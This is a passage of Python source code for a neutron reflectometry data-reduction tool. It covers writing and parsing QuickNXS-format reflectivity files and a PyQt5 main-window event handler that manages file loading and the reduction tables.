fd.write(template.format(**_clean_dict))
# Scattering data
fd.write("#\n")
fd.write("# [Data Runs]\n")
toks = ['%8s' % item for item in dataset_options]
fd.write("# %s\n" % ' '.join(toks))
i_direct_beam = 0
conf = None
for data_set in reduction_list:
conf = data_set.cross_sections[pol_list[0]].configuration
ws = data_set.cross_sections[pol_list[0]].reflectivity_workspace
run_object = ws.getRun()
dpix = run_object.getProperty("DIRPIX").getStatistics().mean
filename = run_object.getProperty("Filename").value
constant_q_binning = run_object.getProperty("constant_q_binning").value
scatt_pos = run_object.getProperty("specular_pixel").value
scaling_factor = conf.scaling_factor
# For some reason, the tth value that QuickNXS expects is offset.
# It seems to be because that same offset is applied later in the QuickNXS calculation.
# Correct tth here so that it can load properly in QuickNXS and produce the same result.
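# Concretely, the correction applied below converts the pixel offset between the
# direct-beam pixel (DIRPIX) and the fitted specular pixel into an angle,
#   delta_tth [deg] = (direct_beam_pix - scatt_pos) * pixel_width / det_distance * 180 / pi,
# and subtracts it from the stored two_theta value.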
tth = run_object.getProperty("two_theta").value
det_distance = run_object['SampleDetDis'].getStatistics().mean / 1000.0
direct_beam_pix = run_object['DIRPIX'].getStatistics().mean
# Get pixel size from instrument properties
if ws.getInstrument().hasParameter("pixel-width"):
pixel_width = float(ws.getInstrument().getNumberParameter("pixel-width")[0]) / 1000.0
else:
pixel_width = 0.0007
tth -= ((direct_beam_pix - scatt_pos) * pixel_width) / det_distance * 180.0 / math.pi
normalization_run = run_object.getProperty("normalization_run").value
if normalization_run == "None":
db_id = 0
else:
i_direct_beam += 1
db_id = i_direct_beam
item = dict(scale=scaling_factor, DB_ID=db_id,
P0=conf.cut_first_n_points, PN=conf.cut_last_n_points, tth=tth,
fan=constant_q_binning,
x_pos=conf.peak_position,
x_width=conf.peak_width,
y_pos=conf.low_res_position,
y_width=conf.low_res_width,
bg_pos=conf.bck_position,
bg_width=conf.bck_width,
dpix=dpix,
number=str(ws.getRunNumber()),
File=filename)
par_list = ['{%s}' % p for p in dataset_options]
template = "# %s\n" % ' '.join(par_list)
_clean_dict = {}
for key in item:
if isinstance(item[key], str):
_clean_dict[key] = "%8s" % item[key]
else:
_clean_dict[key] = "%8g" % item[key]
fd.write(template.format(**_clean_dict))
fd.write("#\n")
fd.write("# [Global Options]\n")
fd.write("# name value\n")
sample_size = 10 if conf is None else conf.sample_size
fd.write("# sample_length %s\n" % str(sample_size))
fd.write("#\n")
fd.close()
def write_reflectivity_data(output_path, data, col_names, as_5col=True):
"""
Write out reflectivity data in a format readable by QuickNXS
:param str output_path: output file path
:param ndarray or list data: data to be written
:param list col_names: list of column names
:param bool as_5col: if True, a 5-column ascii will be written (theta is the last column)
"""
with open(output_path, 'a') as fd:
# Determine how many columns to write
if isinstance(data, list):
four_cols = True
else:
four_cols = not as_5col and data.shape[1] > 4
fd.write("# [Data]\n")
if four_cols:
toks = [u'%12s' % item for item in col_names[:4]]
else:
toks = [u'%12s' % item for item in col_names]
fd.write(u"# %s\n" % '\t'.join(toks))
if isinstance(data, list):
# [TOF][pixel][parameter]
for tof_item in data:
for pixel_item in tof_item:
np.savetxt(fd, pixel_item, delimiter='\t', fmt='%-18e')
fd.write(u'\n')
else:
if four_cols:
np.savetxt(fd, data[:, :4], delimiter=' ', fmt='%-18e')
else:
np.savetxt(fd, data, delimiter='\t', fmt='%-18e')
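# A minimal (hypothetical) call sequence for producing a QuickNXS-compatible file; the
# output name, polarization label and column names are made up for illustration, and
# reduction_list / direct_beam_list are assumed to come from the application's data manager:
#   write_reflectivity_header(reduction_list, direct_beam_list, 'REF_M_1234_Off_Off.dat', '++')
#   write_reflectivity_data('REF_M_1234_Off_Off.dat', refl_array, ['Qz', 'R', 'dR', 'dQz'], as_5col=False)
# Note that write_reflectivity_data() appends to the file, so the header must be written first.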
def read_reduced_file(file_path, configuration=None):
"""
Read in configurations from a reduced data file.
:param str file_path: reduced data file
"""
direct_beam_runs = []
data_runs = []
with open(file_path, 'r') as file_content:
# Section identifier
# 0: None
# 1: direct beams
# 2: data runs
# 3: global options
_in_section = 0
_file_start = True
for line in file_content.readlines():
if _file_start and not line.startswith("# Datafile created by QuickNXS"):
raise RuntimeError("The selected file does not conform to the QuickNXS format")
_file_start = False
if "[Direct Beam Runs]" in line:
_in_section = 1
elif "[Data Runs]" in line:
_in_section = 2
elif "[Global Options]" in line:
_in_section = 3
# Process direct beam runs
if _in_section == 1:
toks = line.split()
if len(toks) < 14 or 'DB_ID' in line:
continue
try:
if configuration is not None:
conf = copy.deepcopy(configuration)
else:
conf = Configuration()
conf.cut_first_n_points = int(toks[2])
conf.cut_last_n_points = int(toks[3])
conf.peak_position = float(toks[4])
conf.peak_width = float(toks[5])
conf.low_res_position = float(toks[6])
conf.low_res_width = float(toks[7])
conf.bck_position = float(toks[8])
conf.bck_width = float(toks[9])
conf.direct_pixel_overwrite = float(toks[10])
run_number = int(toks[12])
run_file = toks[-1]
# This application only deals with event data. To be able to load
# reduced files created with histo nexus files, we have to
# use the corresponding event file instead.
# Similarly, the number of points cut on each side probably
# doesn't make sense, so reset those options.
if run_file.endswith('histo.nxs'):
run_file = run_file.replace('histo.', 'event.')
#conf.cut_first_n_points = 0
#conf.cut_last_n_points = 0
# Catch data files meant for QuickNXS and use the raw file instead
run_file = _find_h5_data(run_file)
direct_beam_runs.append([run_number, run_file, conf])
except:
logging.error("Could not parse reduced data file:\n %s", sys.exc_info()[1])
logging.error(line)
# Process data runs
if _in_section == 2:
toks = line.split()
if len(toks) < 16 or 'DB_ID' in line:
continue
try:
if configuration is not None:
conf = copy.deepcopy(configuration)
else:
conf = Configuration()
conf.scaling_factor = float(toks[1])
conf.cut_first_n_points = int(toks[2])
conf.cut_last_n_points = int(toks[3])
conf.peak_position = float(toks[4])
conf.peak_width = float(toks[5])
conf.low_res_position = float(toks[6])
conf.low_res_width = float(toks[7])
conf.bck_position = float(toks[8])
conf.bck_width = float(toks[9])
conf.use_constant_q = toks[10].strip().lower() == 'true'
conf.direct_pixel_overwrite = float(toks[11])
if int(toks[14]) > 0 and len(direct_beam_runs) > int(toks[14])-1:
conf.normalization = direct_beam_runs[int(toks[14])-1][0]
run_number = int(toks[13])
run_file = toks[-1]
if run_file.endswith('histo.nxs'):
run_file = run_file.replace('histo.', 'event.')
#conf.cut_first_n_points = 0
#conf.cut_last_n_points = 0
run_file = _find_h5_data(run_file)
data_runs.append([run_number, run_file, conf])
except:
logging.error("Could not parse reduced data file:\n %s", sys.exc_info()[1])
logging.error(line)
# Options
if _in_section == 3:
if line.startswith("# sample_length"):
try:
conf.sample_size = float((line[len("# sample_length"):]).strip())
except:
logging.error("Could not extract sample size: %s" % line)
return direct_beam_runs, data_runs
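# A rough usage sketch (file name hypothetical): each returned entry is a
# [run_number, run_file, Configuration] triplet that the caller can feed back
# into the reduction workflow:
#   direct_beams, data_runs = read_reduced_file('REF_M_1234_Off_Off.dat')
#   for run_number, run_file, conf in data_runs:
#       ...  # reload run_file and re-reduce it with the recovered Configuration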
```
#### File: interfaces/event_handlers/main_handler.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
import os
import logging
import glob
import math
import time
from PyQt5 import QtGui, QtCore, QtWidgets
from ..configuration import Configuration
from .progress_reporter import ProgressReporter
class MainHandler(object):
"""
Event handler for the main application window.
"""
def __init__(self, main_window):
self.ui = main_window.ui
self.main_window = main_window
self._data_manager = main_window.data_manager
# Update file list when changes are made
self._path_watcher = QtCore.QFileSystemWatcher([self._data_manager.current_directory],
self.main_window)
self._path_watcher.directoryChanged.connect(self.update_file_list)
self.cache_indicator = QtWidgets.QLabel("Files loaded: 0")
self.cache_indicator.setMargin(5)
self.cache_indicator.setSizePolicy(QtWidgets.QSizePolicy.Fixed,
QtWidgets.QSizePolicy.Preferred)
self.cache_indicator.setMinimumWidth(110)
self.ui.statusbar.addPermanentWidget(self.cache_indicator)
button = QtWidgets.QPushButton('Empty Cache')
self.ui.statusbar.addPermanentWidget(button)
button.pressed.connect(self.empty_cache)
button.setFlat(True)
button.setMaximumSize(150, 20)
# Create progress bar in statusbar
self.progress_bar = QtWidgets.QProgressBar(self.ui.statusbar)
self.progress_bar.setMinimumSize(20, 14)
self.progress_bar.setMaximumSize(140, 100)
self.ui.statusbar.addPermanentWidget(self.progress_bar)
self.status_message = QtWidgets.QLabel("")
self.status_message.setMinimumWidth(1000)
self.status_message.setMargin(5)
self.ui.statusbar.insertWidget(0, self.status_message)
def new_progress_reporter(self):
""" Return a progress reporter """
return ProgressReporter(progress_bar=self.progress_bar, status_bar=self.status_message)
def empty_cache(self):
"""
Empty the data cache
"""
self._data_manager.clear_cache()
self.cache_indicator.setText("Files loaded: 0")
def open_file(self, file_path, force=False, silent=False):
"""
Read a data file
:param str file_path: file path
:param bool force: if true, the file will be reloaded
:param bool silent: if true, the UI will not be updated
"""
if not os.path.isfile(file_path):
self.report_message("File does not exist",
detailed_message="The following file does not exist:\n %s" % file_path,
pop_up=True, is_error=True)
return
t_0 = time.time()
self.main_window.auto_change_active = True
try:
self.report_message("Loading file %s" % file_path)
prog = ProgressReporter(progress_bar=self.progress_bar, status_bar=self.status_message)
configuration = self.get_configuration()
self._data_manager.load(file_path, configuration, force=force, progress=prog)
self.report_message("Loaded file %s" % self._data_manager.current_file_name)
except:
self.report_message("Error loading file %s" % self._data_manager.current_file_name,
                     detailed_message=str(sys.exc_info()[1]), pop_up=False, is_error=True)
if not silent:
self.file_loaded()
self.main_window.auto_change_active = False
logging.info("DONE: %s sec", time.time()-t_0)
def file_loaded(self):
"""
Update UI after a file is loaded
"""
self.main_window.auto_change_active = True
current_channel = 0
for i in range(12):
if getattr(self.ui, 'selectedChannel%i'%i).isChecked():
current_channel = i
success = self._data_manager.set_channel(current_channel)
if not success:
self.ui.selectedChannel0.setChecked(True)
channels = self._data_manager.data_sets.keys()
for i, channel in enumerate(channels):
getattr(self.ui, 'selectedChannel%i'%i).show()
good_label = channel.replace('_', '-')
if not good_label == self._data_manager.data_sets[channel].cross_section_label:
good_label = "%s: %s" % (good_label, self._data_manager.data_sets[channel].cross_section_label)
getattr(self.ui, 'selectedChannel%i'%i).setText(good_label)
for i in range(len(channels), 12):
getattr(self.ui, 'selectedChannel%i'%i).hide()
self.main_window.auto_change_active = False
self.main_window.file_loaded_signal.emit()
self.main_window.initiate_reflectivity_plot.emit(False)
self.main_window.initiate_projection_plot.emit(False)
self.cache_indicator.setText('Files loaded: %s' % (self._data_manager.get_cachesize()))
def update_tables(self):
"""
Update a data set that may be in the reduction table or the
direct beam table.
"""
# Update the reduction table if this data set is in it
idx = self._data_manager.find_active_data_id()
if idx is not None:
self.update_reduction_table(idx, self._data_manager.active_channel)
# Update the direct beam table if this data set is in it
idx = self._data_manager.find_active_direct_beam_id()
if idx is not None:
self.update_direct_beam_table(idx, self._data_manager.active_channel)
def update_calculated_data(self):
"""
Update the calculated entries in the overview tab.
We should call this after the peak ranges change, or
after a change is made that will affect the displayed results.
"""
d = self._data_manager.active_channel
self.ui.datasetAi.setText(u"%.3f°"%(d.scattering_angle))
wl_min, wl_max = d.wavelength_range
self.ui.datasetLambda.setText(u"%.2f (%.2f-%.2f) Å"%(d.lambda_center,
wl_min, wl_max))
# DIRPIX and DANGLE0 overwrite
if self.ui.set_dangle0_checkbox.isChecked():
dangle0 = u"%.3f° (%.3f°)" % (float(self.ui.dangle0Overwrite.text()), d._angle_offset)
else:
dangle0 = u"%.3f°"%(d.angle_offset)
self.ui.datasetDangle0.setText(dangle0)
if self.ui.set_dirpix_checkbox.isChecked():
dpix = u"%.1f (%.1f)" % (float(self.ui.directPixelOverwrite.value()), d._direct_pixel)
else:
dpix = u"%.1f"%d.direct_pixel
self.ui.datasetDirectPixel.setText(dpix)
if d.configuration.normalization is not None:
self.ui.matched_direct_beam_label.setText(u"%s" % d.configuration.normalization)
else:
self.ui.matched_direct_beam_label.setText(u"None")
def update_info(self):
"""
Update metadata shown in the overview tab.
"""
self.main_window.auto_change_active = True
d = self._data_manager.active_channel
self.populate_from_configuration(d.configuration)
self.main_window.initiate_projection_plot.emit(False)
QtWidgets.QApplication.instance().processEvents()
if self.ui.set_dangle0_checkbox.isChecked():
dangle0 = u"%.3f° (%.3f°)" % (float(self.ui.dangle0Overwrite.text()), d.angle_offset)
else:
dangle0 = u"%.3f°"%(d.angle_offset)
if self.ui.set_dirpix_checkbox.isChecked():
dpix = u"%.1f (%.1f)" % (float(self.ui.directPixelOverwrite.value()), d.direct_pixel)
else:
dpix = u"%.1f"%d.direct_pixel
wl_min, wl_max = d.wavelength_range
self.ui.datasetLambda.setText(u"%.2f (%.2f-%.2f) Å"%(d.lambda_center,
wl_min, wl_max))
self.ui.datasetPCharge.setText(u"%.3e"%d.proton_charge)
self.ui.datasetTime.setText(u"%i s"%d.total_time)
self.ui.datasetTotCounts.setText(u"%.4e"%d.total_counts)
try:
self.ui.datasetRate.setText(u"%.1f cps"%(d.total_counts/d.total_time))
except ZeroDivisionError:
self.ui.datasetRate.setText(u"NaN")
self.ui.datasetDangle.setText(u"%.3f°"%d.dangle)
self.ui.datasetDangle0.setText(dangle0)
self.ui.datasetSangle.setText(u"%.3f°"%d.sangle)
self.ui.datasetDirectPixel.setText(dpix)
self.ui.currentChannel.setText('<b>%s</b> (%s) Type: %s Current State: <b>%s</b>'%(d.number, d.experiment,
d.measurement_type, d.name))
# Update direct beam indicator
if d.is_direct_beam:
self.ui.is_direct_beam_label.setText(u"Direct beam")
else:
self.ui.is_direct_beam_label.setText(u"")
# Update the calculated data
self.update_calculated_data()
self.ui.roi_used_label.setText(u"%s" % d.use_roi_actual)
self.ui.roi_peak_label.setText(u"%s" % str(d.meta_data_roi_peak))
self.ui.roi_bck_label.setText(u"%s" % str(d.meta_data_roi_bck))
# Update reduction tables
self.update_tables()
self.active_data_changed()
self.main_window.auto_change_active = False
def update_file_list(self, file_path=None):
"""
Update the list of data files
"""
self.main_window.auto_change_active = True
if file_path is not None and not file_path==self._data_manager.current_directory:
if os.path.isdir(file_path):
file_dir = file_path
else:
file_dir, file_name = os.path.split(file_path)
self._data_manager.current_file_name = file_name
self.main_window.settings.setValue('current_directory', file_dir)
self._path_watcher.removePath(self._data_manager.current_directory)
self._data_manager.current_directory = file_dir
self._path_watcher.addPath(self._data_manager.current_directory)
# Update the list of files
event_file_list = glob.glob(os.path.join(self._data_manager.current_directory, '*event.nxs'))
h5_file_list = glob.glob(os.path.join(self._data_manager.current_directory, '*.nxs.h5'))
event_file_list.extend(h5_file_list)
event_file_list.sort()
event_file_list = [os.path.basename(name) for name in event_file_list]
current_list = [self.ui.file_list.item(i).text() for i in range(self.ui.file_list.count())]
if event_file_list != current_list:
self.ui.file_list.clear()
for item in event_file_list:
listitem = QtWidgets.QListWidgetItem(item, self.ui.file_list)
if item == self._data_manager.current_file_name:
self.ui.file_list.setCurrentItem(listitem)
else:
try:
self.ui.file_list.setCurrentRow(event_file_list.index(self._data_manager.current_file_name))
except ValueError:
self.report_message("Could not set file selection: %s" % self._data_manager.current_file_name,
                         detailed_message=str(sys.exc_info()[1]), pop_up=False, is_error=True)
self.main_window.auto_change_active = False
def automated_file_selection(self):
"""
Go through the files in the current directory in order of run number, and
load files until the incident angle is no longer increasing.
"""
self.main_window.auto_change_active = True
# Update the list of files
event_file_list = glob.glob(os.path.join(self._data_manager.current_directory, '*event.nxs'))
h5_file_list = glob.glob(os.path.join(self._data_manager.current_directory, '*.nxs.h5'))
event_file_list.extend(h5_file_list)
event_file_list.sort()
event_file_list = [os.path.basename(name) for name in event_file_list]
current_file_found = False
n_count = 0
logging.error("Current file: %s", self._data_manager.current_file_name)
q_current = self._data_manager.extract_meta_data().mid_q
# Add the current data set to the reduction table
# Do nothing if the data is incompatible
is_direct_beam = self._data_manager.active_channel.is_direct_beam
if is_direct_beam:
if not self.add_direct_beam():
return
else:
if not self.add_reflectivity():
return
for f in event_file_list:
file_path = str(os.path.join(self._data_manager.current_directory, f))
if current_file_found and n_count < 10:
n_count += 1
meta_data = self._data_manager.extract_meta_data(file_path)
if q_current <= meta_data.mid_q and is_direct_beam == meta_data.is_direct_beam:
q_current = meta_data.mid_q
self.open_file(file_path, silent=True)
d = self._data_manager.active_channel
# If we find data of another type, stop here
if not is_direct_beam == self._data_manager.active_channel.is_direct_beam:
break
self.main_window.auto_change_active = True
self.populate_from_configuration(d.configuration)
if self._data_manager.active_channel.is_direct_beam:
self.add_direct_beam()
else:
self.add_reflectivity()
if f == self._data_manager.current_file_name:
current_file_found = True
# At the very end, update the UI and plot reflectivity
if n_count > 0:
self.main_window.auto_change_active = True
self.file_loaded()
self.main_window.auto_change_active = False
def open_reduced_file_dialog(self):
"""
Open a reduced file and all the data files needed to reproduce it.
"""
# Open file dialog
filter_ = u'QuickNXS files (*.dat);;All (*.*)'
output_dir = self.main_window.settings.value('output_directory', os.path.expanduser('~'))
file_path, _ = QtWidgets.QFileDialog.getOpenFileName(self.main_window, u'Open reduced file...',
directory=output_dir,
filter=filter_)
t_0 = time.time()
if file_path:
# Clear the reduction list first so that we don't create problems later
self.clear_direct_beams()
self.clear_reflectivity()
configuration = self.get_configuration()
prog = self.new_progress_reporter()
self._data_manager.load_data_from_reduced_file(file_path, configuration=configuration,
progress=prog)
# Update output directory
file_dir, _ = os.path.split(file_path)
self.main_window.settings.setValue('output_directory', file_dir)
self.main_window.auto_change_active = True
self.ui.normalizeTable.setRowCount(len(self._data_manager.direct_beam_list))
for idx, _ in enumerate(self._data_manager.direct_beam_list):
self._data_manager.set_active_data_from_direct_beam_list(idx)
self.update_direct_beam_table(idx, self._data_manager.active_channel)
self.ui.reductionTable.setRowCount(len(self._data_manager.reduction_list))
for idx, _ in enumerate(self._data_manager.reduction_list):
self._data_manager.set_active_data_from_reduction_list(idx)
self.update_reduction_table(idx, self._data_manager.active_channel)
direct_beam_ids = [str(r.number) for r in self._data_manager.direct_beam_list]
self.ui.normalization_list_label.setText(u", ".join(direct_beam_ids))
self.file_loaded()
if self._data_manager.active_channel is not None:
self.populate_from_configuration(self._data_manager.active_channel.configuration)
self.update_file_list(self._data_manager.current_file)
self.main_window.auto_change_active = False
logging.info("UI updated: %s", time.time()-t_0)
# Actions defined in Qt Designer
def file_open_dialog(self):
"""
Show a dialog to open a new file.
TODO: consider multiple selection. In this case QuickNXS tries to automatically sort and reduce.
"""
if self.ui.histogramActive.isChecked():
filter_ = u'All (*.*);;histo.nxs (*histo.nxs)'
else:
filter_ = u'All (*.*);;nxs.h5 (*nxs.h5);;event.nxs (*event.nxs)'
file_path, _ = QtWidgets.QFileDialog.getOpenFileName(self.main_window, u'Open NXS file...',
directory=self._data_manager.current_directory,
filter=filter_)
if file_path:
self.update_file_list(file_path)
self.open_file(file_path)
def open_run_number(self, number=None):
"""
Open a data file by typing a run number
"""
self.main_window.auto_change_active = True
if number is None:
number = self.ui.numberSearchEntry.text()
QtWidgets.QApplication.instance().processEvents()
# Look for new-style nexus file name
configuration = self.get_configuration()
search_string = configuration.instrument.file_search_template % number
file_list = glob.glob(search_string+'.nxs.h5')
# Look for old-style nexus file name
if not file_list:
search_string = configuration.instrument.legacy_search_template % number
file_list = glob.glob(search_string+'_event.nxs')
self.ui.numberSearchEntry.setText('')
success = False
if file_list:
self.update_file_list(file_list[0])
self.open_file(os.path.abspath(file_list[0]))
success = True
else:
self.report_message("Could not locate file %s" % number, pop_up=True)
self.main_window.auto_change_active = False
return success
def update_daslog(self):
"""
Write parameters from all file daslogs to the table in the
daslog tab.
"""
table = self.ui.daslogTableBox
table.setRowCount(0)
table.sortItems(-1)
table.setColumnCount(len(self._data_manager.data_sets)+2)
table.setHorizontalHeaderLabels(['Name'] + list(self._data_manager.data_sets.keys()) + ['Unit'])
for j, key in enumerate(sorted(self._data_manager.active_channel.logs.keys(), key=lambda s: s.lower())):
table.insertRow(j)
table.setItem(j, 0, QtWidgets.QTableWidgetItem(key))
table.setItem(j, len(self._data_manager.data_sets)+1,
QtWidgets.QTableWidgetItem(self._data_manager.active_channel.log_units[key]))
i = 0
for xs in self._data_manager.data_sets:
item = QtWidgets.QTableWidgetItem(u'%g' % self._data_manager.data_sets[xs].logs[key])
item.setToolTip(u'MIN: %g MAX: %g' % (self._data_manager.data_sets[xs].log_minmax[key]))
table.setItem(j, i+1, item)
i += 1
table.resizeColumnsToContents()
def add_reflectivity(self, silent=False):
"""
Collect information about the current extraction settings and store them
in the list of reduction items.
Returns true if everything is ok, false otherwise.
"""
# Update the configuration according to current parameters
# Note that when a data set is first loaded, the peaks may have a different
# range for each cross-section. If the option to use a common set of ranges
# was turned on, we pick the ranges from the currently active cross-section
# and apply them to all cross-sections.
if self.ui.action_use_common_ranges.isChecked():
config = self.get_configuration()
self._data_manager.update_configuration(configuration=config, active_only=False)
# Verify that the new data is consistent with existing data in the table
if not self._data_manager.add_active_to_reduction():
if not silent:
self.report_message("Data incompatible or already in the list.", pop_up=True)
return False
self.main_window.auto_change_active = True
# Update the reduction and direct beam tables
idx = self._data_manager.find_data_in_reduction_list(self._data_manager._nexus_data)
self.ui.reductionTable.insertRow(idx)
self.update_tables()
self.main_window.initiate_reflectivity_plot.emit(True)
self.main_window.update_specular_viewer.emit()
self.main_window.auto_change_active = False
return True
def update_reduction_table(self, idx, d):
"""
Update the reduction table
:param int idx: row index
:param CrossSectionData d: data object
"""
self.main_window.auto_change_active = True
item = QtWidgets.QTableWidgetItem(str(d.number))
if d == self._data_manager.active_channel:
item.setBackground(QtGui.QColor(246, 213, 16))
else:
item.setBackground(QtGui.QColor(255, 255, 255))
item.setFlags(item.flags() & ~QtCore.Qt.ItemIsEditable)
self.ui.reductionTable.setItem(idx, 0, item)
self.ui.reductionTable.setItem(idx, 1,
QtWidgets.QTableWidgetItem("%.4f"%(d.configuration.scaling_factor)))
self.ui.reductionTable.setItem(idx, 2,
QtWidgets.QTableWidgetItem(str(d.configuration.cut_first_n_points)))
self.ui.reductionTable.setItem(idx, 3,
QtWidgets.QTableWidgetItem(str(d.configuration.cut_last_n_points)))
item = QtWidgets.QTableWidgetItem(str(d.configuration.peak_position))
item.setBackground(QtGui.QColor(200, 200, 200))
self.ui.reductionTable.setItem(idx, 4, item)
self.ui.reductionTable.setItem(idx, 5,
QtWidgets.QTableWidgetItem(str(d.configuration.peak_width)))
item = QtWidgets.QTableWidgetItem(str(d.configuration.low_res_position))
item.setBackground(QtGui.QColor(200, 200, 200))
self.ui.reductionTable.setItem(idx, 6, item)
self.ui.reductionTable.setItem(idx, 7,
QtWidgets.QTableWidgetItem(str(d.configuration.low_res_width)))
item = QtWidgets.QTableWidgetItem(str(d.configuration.bck_position))
item.setBackground(QtGui.QColor(200, 200, 200))
self.ui.reductionTable.setItem(idx, 8, item)
self.ui.reductionTable.setItem(idx, 9,
QtWidgets.QTableWidgetItem(str(d.configuration.bck_width)))
self.ui.reductionTable.setItem(idx, 10,
QtWidgets.QTableWidgetItem(str(d.direct_pixel)))
self.ui.reductionTable.setItem(idx, 11,
QtWidgets.QTableWidgetItem("%.4f"%d.scattering_angle))
norma = 'none'
if d.configuration.normalization is not None:
norma = d.configuration.normalization
self.ui.reductionTable.setItem(idx, 12,
QtWidgets.QTableWidgetItem(str(norma)))
self.main_window.auto_change_active = False
def clear_reflectivity(self):
"""
Remove all items from the reduction list.
"""
self._data_manager.reduction_list = []
self.ui.reductionTable.setRowCount(0)
self.main_window.initiate_reflectivity_plot.emit(False)
def clear_direct_beams(self):
"""
Remove all items from the direct beam list.
"""
self._data_manager.clear_direct_beam_list()
self.ui.normalizeTable.setRowCount(0)
self.ui.normalization_list_label.setText(u"None")
self.main_window.initiate_reflectivity_plot.emit(False)
def remove_reflectivity(self):
"""
Remove one item from the reduction list.
"""
index = self.ui.reductionTable.currentRow()
if index < 0:
return
self._data_manager.reduction_list.pop(index)
self.ui.reductionTable.removeRow(index)
self.main_window.initiate_reflectivity_plot.emit(False)
def remove_direct_beam(self):
"""
Remove one item from the direct beam list.
"""
index = self.ui.normalizeTable.currentRow()
if index < 0:
return
self._data_manager.direct_beam_list.pop(index)
self.ui.normalizeTable.removeRow(index)
self.main_window.initiate_reflectivity_plot.emit(False)
def reduction_table_changed(self, item):
"""
Perform action upon change in the data reduction list.
"""
if self.main_window.auto_change_active:
return
entry = item.row()
column = item.column()
refl = self._data_manager.reduction_list[entry]
#TODO: If we changed the normalization run, make sure it's in the list
# of direct beams we know about.
keys = ['number', 'scaling_factor', 'cut_first_n_points', 'cut_last_n_points',
'peak_position', 'peak_width', 'low_res_position', 'low_res_width',
'bck_position', 'bck_width', 'direct_pixel', 'scattering_angle', 'normalization']
# Update settings from selected option
if column in [1, 4, 5, 6, 7, 8, 9, 10]:
refl.set_parameter(keys[column], float(item.text()))
elif column in [2, 3]:
refl.set_parameter(keys[column], int(item.text()))
elif column == 12:
try:
refl.set_parameter(keys[column], item.text())
except:
refl.set_parameter(keys[column], None)
item.setText("none")
# Update calculated data
refl.update_calculated_values()
# If the changed data set is the active data, also change the UI
if self._data_manager.is_active(refl):
self.main_window.auto_change_active = True
self.update_info()
self.main_window.auto_change_active = False
# Update the direct beam table if this data set is in it
idx = self._data_manager.find_data_in_direct_beam_list(refl)
if idx is not None:
channels = list(refl.cross_sections.keys())
self.update_direct_beam_table(idx, refl.cross_sections[channels[0]])
# Only recalculate if we need to, otherwise just replot
if column not in [1, 2, 3]:
try:
self._data_manager.calculate_reflectivity(nexus_data=refl)
except:
self.report_message("Could not compute reflectivity for %s" % self._data_manager.current_file_name,
                             detailed_message=str(sys.exc_info()[1]), pop_up=False, is_error=False)
self.main_window.initiate_reflectivity_plot.emit(True)
self.main_window.update_specular_viewer.emit()
def add_direct_beam(self, silent=False):
"""
Add / remove dataset to the available normalizations or clear the normalization list.
"""
# Update all cross-section parameters as needed.
if self.ui.action_use_common_ranges.isChecked():
config = self.get_configuration()
self._data_manager.update_configuration(configuration=config, active_only=False)
# Verify that the new data is consistent with existing data in the table
if not self._data_manager.add_active_to_normalization():
if not silent:
self.report_message("Data incompatible or already in the list.", pop_up=True)
return False
self.ui.normalizeTable.setRowCount(len(self._data_manager.direct_beam_list))
self.update_tables()
direct_beam_ids = [str(r.number) for r in self._data_manager.direct_beam_list]
self.ui.normalization_list_label.setText(u", ".join(direct_beam_ids))
self.main_window.initiate_reflectivity_plot.emit(False)
return True
def update_direct_beam_table(self, idx, d):
"""
Update a direct beam table entry
:param int idx: row index
:param CrossSectionData d: data object
"""
self.main_window.auto_change_active = True
item = QtWidgets.QTableWidgetItem(str(d.number))
item.setFlags(item.flags() & ~QtCore.Qt.ItemIsEditable)
if d == self._data_manager.active_channel:
item.setBackground(QtGui.QColor(246, 213, 16))
else:
item.setBackground(QtGui.QColor(255, 255, 255))
self.ui.normalizeTable.setItem(idx, 0, QtWidgets.QTableWidgetItem(item))
wl = u"%s - %s" % (d.wavelength[0], d.wavelength[-1])
self.ui.normalizeTable.setItem(idx, 7, QtWidgets.QTableWidgetItem(wl))
item = QtWidgets.QTableWidgetItem(str(d.configuration.peak_position))
item.setBackground(QtGui.QColor(200, 200, 200))
self.ui.normalizeTable.setItem(idx, 1, QtWidgets.QTableWidgetItem(item))
self.ui.normalizeTable.setItem(idx, 2, QtWidgets.QTableWidgetItem(str(d.configuration.peak_width)))
item = QtWidgets.QTableWidgetItem(str(d.configuration.low_res_position))
item.setBackground(QtGui.QColor(200, 200, 200))
self.ui.normalizeTable.setItem(idx, 3, QtWidgets.QTableWidgetItem(item))
self.ui.normalizeTable.setItem(idx, 4, QtWidgets.QTableWidgetItem(str(d.configuration.low_res_width)))
item = QtWidgets.QTableWidgetItem(str(d.configuration.bck_position))
item.setBackground(QtGui.QColor(200, 200, 200))
self.ui.normalizeTable.setItem(idx, 5, QtWidgets.QTableWidgetItem(item))
self.ui.normalizeTable.setItem(idx, 6, QtWidgets.QTableWidgetItem(str(d.configuration.bck_width)))
self.main_window.auto_change_active = False
def active_data_changed(self):
"""
Actions to be taken once the active data set has changed
"""
# If we update an entry, it's because that data is currently active.
# Highlight it and un-highlight the other ones.
self.main_window.auto_change_active = True
idx = self._data_manager.find_active_data_id()
for i in range(self.ui.reductionTable.rowCount()):
item = self.ui.reductionTable.item(i, 0)
if item is not None:
if i == idx:
item.setBackground(QtGui.QColor(246, 213, 16))
else:
item.setBackground(QtGui.QColor(255, 255, 255))
idx = self._data_manager.find_active_direct_beam_id()
for i in range(self.ui.normalizeTable.rowCount()):
item = self.ui.normalizeTable.item(i, 0)
if item is not None:
if i == idx:
item.setBackground(QtGui.QColor(246, 213, 16))
else:
item.setBackground(QtGui.QColor(255, 255, 255))
self.main_window.auto_change_active = False
def compute_offspec_on_change(self, force=False):
"""
Compute off-specular as needed
"""
prog = self.new_progress_reporter()
has_changed_values = self.check_region_values_changed()
offspec_data_exists = self._data_manager.is_offspec_available()
logging.info("Exists %s %s", has_changed_values, offspec_data_exists)
if force or has_changed_values>=0 or not offspec_data_exists:
logging.info("Updating....")
config = self.get_configuration()
self._data_manager.update_configuration(configuration=config, active_only=False)
self._data_manager.reduce_offspec(progress=prog)
def compute_gisans_on_change(self, force=False, active_only=True):
"""
Compute GISANS as needed
"""
prog = self.new_progress_reporter()
has_changed_values = self.check_region_values_changed()
gisans_data_exists = self._data_manager.is_gisans_available(active_only=active_only)
logging.info("Exists %s %s %s", force, has_changed_values, gisans_data_exists)
if force or has_changed_values>=0 or not gisans_data_exists:
logging.info("Updating....")
config = self.get_configuration()
self._data_manager.update_configuration(configuration=config, active_only=False)
if active_only:
self._data_manager.calculate_gisans(progress=prog)
else:
self._data_manager.reduce_gisans(active_only=active_only, progress=prog)
def check_region_values_changed(self):
"""
Check whether any of the parameters tied to the changeRegionValues()
slot have changed.
